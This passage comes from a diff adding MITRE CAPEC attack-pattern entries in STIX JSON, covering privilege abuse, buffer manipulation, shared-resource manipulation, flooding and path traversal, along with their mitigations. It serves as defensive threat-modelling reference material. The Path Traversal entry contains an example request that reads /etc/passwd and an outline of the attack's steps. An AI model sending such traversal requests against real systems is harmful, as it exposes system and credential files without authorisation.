"course-of-action--5d87e697-369a-4c96-a265-70c9a99bcc01", + "target_ref": "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.", + "external_references": [ + { + "external_id": "CAPEC-122", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1317", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1317.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Privilege Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Improperly configured account privileges allowed unauthorized users on a hospital's network to access the medical records for over 3,000 patients. Thus compromising data integrity and confidentiality in addition to HIPAA violations.\n " + ], + "x_capec_extended_description": "\n If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts.\n This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac", + "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7" + ], + "x_capec_prerequisites": [ + "The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.", + "The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The ability to access the target is required." + ], + "x_capec_skills_required": { + "Low": "Adversary can leverage privileged features they already have access to without additional effort or skill. Adversary is only required to have access to an account with improper priveleges." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure account privileges such privileged/administrator functionality is not exposed to non-privileged/lower accounts.", + "id": "course-of-action--556e719c-c102-427d-b5b4-11a4dab62f8e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-122-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--957019cc-30e1-4d46-9ee9-1b20f9b69653", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--556e719c-c102-427d-b5b4-11a4dab62f8e", + "target_ref": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.", + "external_references": [ + { + "external_id": "CAPEC-123", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/123.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + } + ], + "id": "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Buffer Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A buffer manipulation attack often results in a crash of the application due to the corruption of memory.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Modify Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Read Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--40eddae8-4d7d-4fc3-b220-1c9706f01a96" + ], + "x_capec_prerequisites": [ + "The adversary must identify a programmatic means for interacting with a buffer, such as vulnerable C code, and be able to provide input to this interaction." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. Finally, there may be operating system level preventative functionality that can be applied.", + "id": "course-of-action--69611262-87d4-4bba-8db4-068c40577c4c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-123-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2e47286-34b7-484e-a95b-67f1b21ae24b", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69611262-87d4-4bba-8db4-068c40577c4c", + "target_ref": "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a resource shared between multiple applications, an application pool or hardware pin multiplexing to affect behavior. Resources may be shared between multiple applications or between multiple threads of a single application. Resource sharing is usually accomplished through mutual access to a single memory location or multiplexed hardware pins. If an adversary can manipulate this shared resource (usually by co-opting one of the applications or threads) the other applications or threads using the shared resource will often continue to trust the validity of the compromised shared resource and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared resource, or even cause a crash or compromise of the sharing applications.", + "external_references": [ + { + "external_id": "CAPEC-124", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/124.html" + }, + { + "external_id": "CWE-1189", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1189.html" + }, + { + "external_id": "CWE-1331", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1331.html" + } + ], + "id": "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Shared Resource Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "The target applications, threads or functions must share resources between themselves.", + "The adversary must be able to manipulate some piece of the shared resource either directly or indirectly and the other users of the data must accept the changed data as valid. Usually this requires that the adversary be able to compromise one of the sharing applications or threads in order to manipulate the shared data." + ], + "x_capec_resources_required": [ + "None: The attacker does not need any specialized resources to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.", + "external_references": [ + { + "external_id": "CAPEC-125", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/125.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + }, + { + "description": "Traffic flood", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Traffic_flood" + } + ], + "id": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Flooding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90" + ], + "x_capec_prerequisites": [ + "Any target that services requests is vulnerable to this attack on some level of scale." + ], + "x_capec_resources_required": [ + "A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that protocols have specific limits of scale configured.", + "id": "course-of-action--55bca578-149c-4129-a003-3c2d5bd54b5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22178117-f064-4303-8985-7fd9ee2fe9d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55bca578-149c-4129-a003-3c2d5bd54b5b", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits.", + "id": "course-of-action--c8dd811c-2eb5-418e-aeda-80170abad702", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0a57d15-98a3-44ab-9dee-7451762bc00b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c8dd811c-2eb5-418e-aeda-80170abad702", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "id": "course-of-action--6c5ef0e0-77e5-40d3-85bf-7c50693c211d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22e10e44-9d16-4de8-9376-289ccde29247", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c5ef0e0-77e5-40d3-85bf-7c50693c211d", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", + "external_references": [ + { + "external_id": "CAPEC-126", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/126.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "description": "Path Traversal", + "external_id": "33", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Path-Traversal" + }, + { + "description": "Path Traversal", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Path_Traversal" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Directory Traversal" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable file inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62" + ], + "x_capec_prerequisites": [ + "The attacker must be able to control the path that is requested of the target.", + "The target must fail to adequately sanitize incoming paths" + ], + "x_capec_resources_required": [ + "The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks or to inject the malicious payload in a web page.", + "Medium": "Customizing attacks to bypass non trivial filters in the application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Configure the access control correctly.", + "id": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--990d82cc-54c9-4536-8db1-9e1e4d3c1162", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Enforce principle of least privilege.", + "id": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fc0b9ea2-577b-4cae-a52b-606ae9ea8f84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.", + "id": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--594c4c5a-1764-41b8-91aa-dc032c6ae92a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f114c5f3-cfbd-4300-b255-e4bfeb5672be", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.", + "id": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9efb30cd-a0e5-4666-998f-c9119096f678", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.", + "id": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2aeb9107-ab93-4c87-b9c5-a7eabd78976b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.", + "id": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7a2a574-4587-4e1f-83a1-69fa413c6fbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform input validation for all remote content, including remote and user-generated content.", + "id": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-7", + 